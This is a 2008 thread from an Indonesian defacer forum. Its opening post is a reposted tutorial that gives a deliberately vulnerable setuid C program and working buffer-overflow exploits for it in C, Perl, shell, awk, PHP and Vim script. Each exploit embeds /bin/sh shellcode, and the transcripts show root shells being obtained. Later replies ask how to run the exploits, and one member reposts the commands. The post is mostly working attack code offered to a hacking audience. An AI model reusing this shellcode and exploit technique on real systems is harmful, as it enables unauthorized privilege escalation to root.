Komunitas Defacer Indonesia


 

IndeksPortalFAQPencarianAnggotaGroupPendaftaranLogin

Share | 
 

 exploit overflow with C++

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
doniskynet
Newbie
Newbie


Jumlah posting : 18
Join date : 14.05.08
Lokasi : Skynet Corporation

PostSubyek: exploit overflow with C++   Thu May 22, 2008 7:33 pm

Overflow exploits are not only compiled by C. Instead, they can be compiled by almost any programming language. The examples in this article are tested on Linux and demonstrated by overflow exploits compiled by C, Perl, Shell and Awk. The reason for this choice is that almost all these languages are bundled with Unix (except for C in commercial Unix systems).

In the following examples accurate location is implemented basically by placeing SHELLCODE to environment variables.

<1> vul.c that is vulnerable to overflow

[cloud@test]$ id
uid=505(cloud) gid=503(test) groups=503(test)
[cloud@test]$ cat vul.c
/* Demo
Have a bof vul at argv[1].
Write by watercloud @ xfocus.org
*/
#include<stdio.h>
int main(int argc,char * argv[])
{
char buff[32];
if(argc > 1)
{
strcpy(buff,argv[1]);
}
printf("buff : %s\n",buff);
return 0;
}
[cloud@test]$ gcc vul.c -o vul
[cloud@test]$ ls -l vul
-rwxr-xr-x 1 cloud test 11627 2月 24 10:14 vul
[cloud@test]$ sudo chown root vul
[cloud@test]$ sudo chmod u+s vul
[cloud@test]$ ls -lh vul
-rwsr-xr-x 1 root test 11K 2月 24 10:14 vul




<2> C exploit ex.c


[cloud@test]$ cat ex.c
/* Demo for exploit bof of "./vul"
Write by watercloud @ xfocus.org
*/
#include <stdio.h>
#define TARGET "./vul"
#define ADDR 0xbffff3e8
char SH[]="1\xc0PPP[YZ4\xd0\xcd\x80"
"j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
int main(int argc,char * argv[])
{
char env_buff[4000];
char cmd_buff[1024];
int i,ret;
unsigned int *pi;
char * pc;

for(i=0;i<3096;env_buff[i++]=0x90){ };
env_buff[i]='\0';
strcat(env_buff,SH);
setenv("KK",env_buff,1);
strcpy(cmd_buff,TARGET);
pc=&cmd_buff[strlen(TARGET)];
*pc++=' ';
for(ret=1,i=0;i<4 && ret;i++)
{
int j;
*pc++='A';
pi=(unsigned int *)pc;
for(j=0;j<20;*pi++=ADDR,j++){};
*pi=0;
ret=system(cmd_buff);
}
return ret;

}
[cloud@test]$ gcc ex.c -o ex
[cloud@test]$ ./ex
buff : A梵胯?胯?胯?胯
?胯?胯?胯?胯?梵胯??
buff : AA梵胯?胯?胯?胯?&#
33007;?胯?胯?胯胯?胯??buff : AAA&
#26805;胯?胯?胯?胯?胯?&#33
007;?胯?胯胯?胯??
buff : AAAA梵胯?胯?胯?胯?&
#33007;?胯?胯?胯
?胯?胯??
sh-2.05b# id
uid=0(root) gid=503(test) groups=503(test)
sh-2.05b# exit
exit



<3> perl exploit ex.pl

[cloud@test]$ cat ex.pl

#!/usr/bin/perl
# Demo for exploit bof of "./vul"
# Write by watercloud @ xfocus.org

#$ENV_LEN=`env |wc -c`
$SHELL="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
$ENV{KK}= "\x90"x 3096 . $SHELL;
for($ret=1,$ag="AA",$i=0;$i<4 && $ret; $ag="A"x $i++) {
$ret=system "./vul",$ag. "\xff\xbf\xe8\xf3"x20; #ADDR:0xbffff3e8
}
#EOF
[cloud@test]$ perl ex.pl
buff : AA胯?胯?胯?胯?胯?胯?
胯?胯?胯?胯?胯?胯?胯?胯
?胯?胯?胯?胯?胯?胯?
sh-2.05b# id
uid=0(root) gid=503(test) groups=503(test)
sh-2.05b# exit
exit



<4> Shell exploit ex.sh

[cloud@test]$ cat ex.sh
#/bin/bash
# Demo for exploit bof of "./vul"
# Write by watercloud @ xfocus.org

#ENV_LEN=`env |wc -c|tr -d ' '`
SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
AG="AA";for (( i=0;i<10;i++));do AG=$AG$AG;done ;AG=$AG$AG$AG #3096
for((i=0;i<20;i++));do AD=$AD"\xff\xbf\xe8\xf3";done #ADDR:0xbffff3e8
export AGSHELL=$AG`echo -e $SH`

for((i=0;i<4;i++)) ;do
AA=$AA"A"
if ./vul $AA`echo -e $AD`
then break
fi
done
#EOF
[cloud@test]$ chmod a+x ex.sh
[cloud@test]$ ./ex.sh
buff : A胯?胯?胯?胯?胯?胯
?胯?胯?胯?胯?胯?胯?胯?胯
?胯?胯?胯?胯?胯?胯?./ex.sh:
line 16: 5287 段错误 ./vul $AA`echo -e $AD`
buff : AA胯?胯?胯?胯?胯?胯?
胯?胯?胯?胯?胯?胯?胯?胯?
胯?胯?胯?胯?胯?胯?
sh-2.05b# id
uid=0(root) gid=503(test) groups=503(test)
sh-2.05b# exit
exit



<5> awk exploit ex.awk

[cloud@test]$ cat ex.awk
# Demo for exploit bof of "./vul"
# Write by watercloud @ xfocus.org

BEGIN{
SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
AG="AA";
for ( i=0;i<10;i++)
{
AG=AG""AG;
}
AG=AG""AG""AG #3096
for(i=0;i<20;i++)
{
AD=AD"\xe8\xf3\xff\xbf"; #ADDR:0xbffff3e8
}

AA="AA"
for(i=0;i<4;i++)
{
AA=AA"A"
system("./vul "AA""AD" "AG""SH)
}
}
#EOF
[cloud@test]$ gawk -f ex.awk /dev/null
buff : AAA梵胯?胯?胯?胯?胯
?胯?胯?胯?胯?胯?胯?胯?胯
?胯?胯?胯?胯?胯?胯??buff : AAAA&#26805
;胯?胯?胯?胯?胯?胯?胯?&
#33007;?胯?胯?胯?胯?胯?胯?胯?&#
33007;?胯?胯?胯??
sh-2.05b# id
uid=0(root) gid=503(test) groups=503(test)
sh-2.05b#


<6> PHP exploit

[cloud@MagicLinux tmp]$ id
uid=502(cloud) gid=502(cloud) groups=502(cloud)
[cloud@MagicLinux tmp]$ ls -l vul
-rwsr-xr-x 1 root root 4895 2月 26 20:57 vul
[cloud@MagicLinux tmp]$ cat ex.php
<?php
$SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
$AG="AA";
for( $i=0;$i<10;$i++){
$AG.=$AG;
}
$AG.=$AG.$AG; #3096

for($i=0;$i<20;$i++) {
$AD.="\xff\xbf\xe8\xf3";#ADDR:0xbffff3e8
}
for($i=0;$i<4;$i++) {
$AA.="A";
print system("./vul ".$AA.$AD.$AG.$SH);
}
?>
[cloud@MagicLinux tmp]$ php ex.php 1>/dev/null
id >&2
uid=0(root) gid=502(cloud) groups=502(cloud)
exit
[cloud@MagicLinux tmp]$



<7> Vim extension script exploit

Even extension programming script of vim compiler can be used to write an
overflow exploit.

[cloud@MagicLinux tmp]$ id
uid=502(cloud) gid=502(cloud) groups=502(cloud)
[cloud@MagicLinux tmp]$ cat ex.vim
let SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80"
let AG="AA"
let i=0
while(i<10)
let AG=AG.AG
let i=i+1
endwhile
let AG=AG.AG.AG
"len of AG is 3096

let AD=""
let i=0
while(i<20)
let AD=AD."\xff\xbf\xe8\xf3"
"ADDR:0xbffff3e8
let i=i+1
endwhile

let AA=""
let i=0
while(i<4)
let AA=AA."A"
execute "!./vul ". AA . AD . AG . SH
let i=i+1
endwhile
[cloud@MagicLinux tmp]$ ls -l vul
-rwsr-xr-x 1 root root 4895 2月 26 20:57 vul
[cloud@MagicLinux tmp]$ vim -eS ex.vim
Xlib: connection to ":0.0" refused by server
Xlib: No protocol specified


buff : A�胯�胯�胯�胯
�胯�胯�胯�胯�
胯�胯�胯�胯�胯
�胯�胯�胯�胯� 胯�胯�胯 驛AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA… …………………………… ……………………………… …… AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1繮PP[YZ4型�jX橰 hn/shh//biT[RSTY蛝sh-2.05b# id uid=0(root) gid=502(cloud) groups=502(cloud)
sh-2.05b#


<8> ......


<9> Summary

The basis of overflow is address location, usage of data structure such as heap, and architechure the organization/OS is running on. Knowing these we can understand that overflow exploit itself is unrelated to programming language.
Kembali Ke Atas Go down
Lihat profil user
cr4wl3r
I'am Not Hacker
I'am Not Hacker


Jumlah posting : 373
Join date : 18.04.08
Age : 30
Lokasi : In Your Mind

PostSubyek: Re: exploit overflow with C++   Tue Jun 10, 2008 8:21 am

ini yg qt da cari dari dulu, thank's bro Very Happy
Kembali Ke Atas Go down
Lihat profil user http://gorontalodefacer.forumandco.com
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?


Jumlah posting : 568
Join date : 18.04.08

PostSubyek: Re: exploit overflow with C++   Tue Jun 10, 2008 10:08 pm

ntu buat apa sih? maklum newbie...

soalnya bahasanya aneh... Smile

_________________
What da fuck!!! are u looking for!?
Kembali Ke Atas Go down
Lihat profil user http://bl4ckb0t.co.cc
s4va
Lamer
Lamer


Jumlah posting : 60
Join date : 18.04.08
Age : 29
Lokasi : di hati tiap umat-Nya

PostSubyek: Re: exploit overflow with C++   Tue Jun 10, 2008 11:31 pm

cara pakenya gimana?
Kembali Ke Atas Go down
Lihat profil user http://s4va.blogsome.com
cr4wl3r
I'am Not Hacker
I'am Not Hacker


Jumlah posting : 373
Join date : 18.04.08
Age : 30
Lokasi : In Your Mind

PostSubyek: Re: exploit overflow with C++   Wed Jun 11, 2008 6:24 am

itu dibikin lewat bahasa C++
untuk menguasainya minimal haru bisa C++ sama assembly
Kembali Ke Atas Go down
Lihat profil user http://gorontalodefacer.forumandco.com
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?


Jumlah posting : 568
Join date : 18.04.08

PostSubyek: Re: exploit overflow with C++   Wed Jun 11, 2008 6:43 am

trus makenya gimana?

_________________
What da fuck!!! are u looking for!?
Kembali Ke Atas Go down
Lihat profil user http://bl4ckb0t.co.cc
exnome
Script Kiddies
Script Kiddies


Jumlah posting : 157
Join date : 15.05.08
Age : 31
Lokasi : Belakang Proxy

PostSubyek: Re: exploit overflow with C++   Wed Jun 11, 2008 11:32 pm

wah ... yg bhasa indonesia ada nggak?

caranya di compire dlu, klo udah bisa didebug dgn debugger assmbler ....

lol! lol! lol!
Kembali Ke Atas Go down
Lihat profil user
exnome
Script Kiddies
Script Kiddies


Jumlah posting : 157
Join date : 15.05.08
Age : 31
Lokasi : Belakang Proxy

PostSubyek: Re: exploit overflow with C++   Thu Jun 12, 2008 12:14 am

tuh cara pkenya :

Code:
1.vul.c that is vulnerable to overflow
[cloud@test]$ gcc vul.c -o vul
[cloud@test]$ ls -l vul
-rwxr-xr-x 1 cloud test 11627 2月 24 10:14 vul
[cloud@test]$ sudo chown root vul
[cloud@test]$ sudo chmod u+s vul
[cloud@test]$ ls -lh vul
-rwsr-xr-x 1 root test 11K 2月 24 10:14 vul


2. C exploit ex.c
[cloud@test]$ gcc ex.c -o ex
[cloud@test]$ ./ex


3. perl exploit ex.pl
[cloud@test]$ perl ex.pl


4. Shell exploit ex.sh
[cloud@test]$ chmod a+x ex.sh
[cloud@test]$ ./ex.sh


5. awk exploit ex.awk
[cloud@test]$ gawk -f ex.awk /dev/null


6. PHP exploit
[cloud@MagicLinux tmp]$ php ex.php 1>/dev/null
id >&2
uid=0(root) gid=502(cloud) groups=502(cloud)
exit
[cloud@MagicLinux tmp]$


7.Vim extension script exploit
[cloud@MagicLinux tmp]$ ls -l vul
-rwsr-xr-x 1 root root 4895 2月 26 20:57 vul
[cloud@MagicLinux tmp]$ vim -eS ex.vim


affraid affraid
Kembali Ke Atas Go down
Lihat profil user
EA Ngel
Lamer
Lamer


Jumlah posting : 53
Join date : 13.05.08

PostSubyek: Re: exploit overflow with C++   Thu Jul 03, 2008 4:23 am

ke ingat ama teknik hackingnya Xnuser
Kembali Ke Atas Go down
Lihat profil user
rezagms
Newbie
Newbie


Jumlah posting : 42
Join date : 27.06.08
Lokasi : GadA

PostSubyek: donie copas >.<   Sat Jul 12, 2008 5:06 pm

jurus cop [as]

Hoa Hoa Hoa Hoaeeemmm... >,<
Kembali Ke Atas Go down
Lihat profil user
d3w0
Lamer
Lamer


Jumlah posting : 55
Join date : 03.05.08

PostSubyek: Re: exploit overflow with C++   Sun Jul 13, 2008 10:21 am

wedew

master2 ni.....Smile

atut.............

kabooooooooor
Kembali Ke Atas Go down
Lihat profil user
funky_shensey
Admin
Admin


Jumlah posting : 356
Join date : 07.05.08
Lokasi : gorontalo

PostSubyek: Re: exploit overflow with C++   Sun Jul 13, 2008 10:37 am

Shocked uiih master apaan tuuhhh

Shocked bener2 mumet

_________________
Kembali Ke Atas Go down
Lihat profil user
cYb3r_jOk3
Script Kiddies
Script Kiddies


Jumlah posting : 232
Join date : 12.05.08
Age : 28
Lokasi : mAlaNk jAWatiMUr

PostSubyek: Re: exploit overflow with C++   Mon Jul 14, 2008 3:40 am

funky_shensey wrote:
Shocked uiih master apaan tuuhhh

Shocked bener2 mumet

wedew yang master ajah mumet pa lagi kita˛ yang newbee malah muter˛ dah

omz bisa dijelasin lagi g' tapi yang lebih dalem yak..... Neutral Neutral Neutral
Kembali Ke Atas Go down
Lihat profil user http://baeimlicious.blogspot.com
exnome
Script Kiddies
Script Kiddies


Jumlah posting : 157
Join date : 15.05.08
Age : 31
Lokasi : Belakang Proxy

PostSubyek: Re: exploit overflow with C++   Sun Jul 20, 2008 6:41 pm

overflow aja? bknnya buffer overflow? neh tutorialnya :
http://en.wikipedia.org/wiki/Buffer_overflow

lol! lol! lol!
Kembali Ke Atas Go down
Lihat profil user
funky_shensey
Admin
Admin


Jumlah posting : 356
Join date : 07.05.08
Lokasi : gorontalo

PostSubyek: Re: exploit overflow with C++   Mon Jul 21, 2008 4:43 am

exnome wrote:
overflow aja? bknnya buffer overflow? neh tutorialnya :
http://en.wikipedia.org/wiki/Buffer_overflow

lol! lol! lol!

Very Happy wew thanzk omzzz

Very Happy brb mo belajar dulu

_________________
Kembali Ke Atas Go down
Lihat profil user
exnome
Script Kiddies
Script Kiddies


Jumlah posting : 157
Join date : 15.05.08
Age : 31
Lokasi : Belakang Proxy

PostSubyek: Re: exploit overflow with C++   Mon Jul 21, 2008 9:08 pm

funky_shensey wrote:
exnome wrote:
overflow aja? bknnya buffer overflow? neh tutorialnya :
http://en.wikipedia.org/wiki/Buffer_overflow

lol! lol! lol!

Very Happy wew thanzk omzzz

Very Happy brb mo belajar dulu

yupz ... sm2, ntar klo udah gntian ajari aku yah ....

What a Face What a Face What a Face
Kembali Ke Atas Go down
Lihat profil user
saint
Script Kiddies
Script Kiddies


Jumlah posting : 157
Join date : 22.05.08
Age : 31
Lokasi : Neraka Bagian Timur

PostSubyek: Re: exploit overflow with C++   Thu Aug 28, 2008 12:06 am

set dah C++
gw ada CD tutorialnya nih,tp ampe detik ini gw g ngerti Razz Razz
Kembali Ke Atas Go down
Lihat profil user http://www.webdeessaint.com
Sponsored content




PostSubyek: Re: exploit overflow with C++   Today at 2:47 am

Kembali Ke Atas Go down
 
exploit overflow with C++
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
::Gorontalo Defacer Community:: :: General Topic :: Tips and Trik-
Navigasi: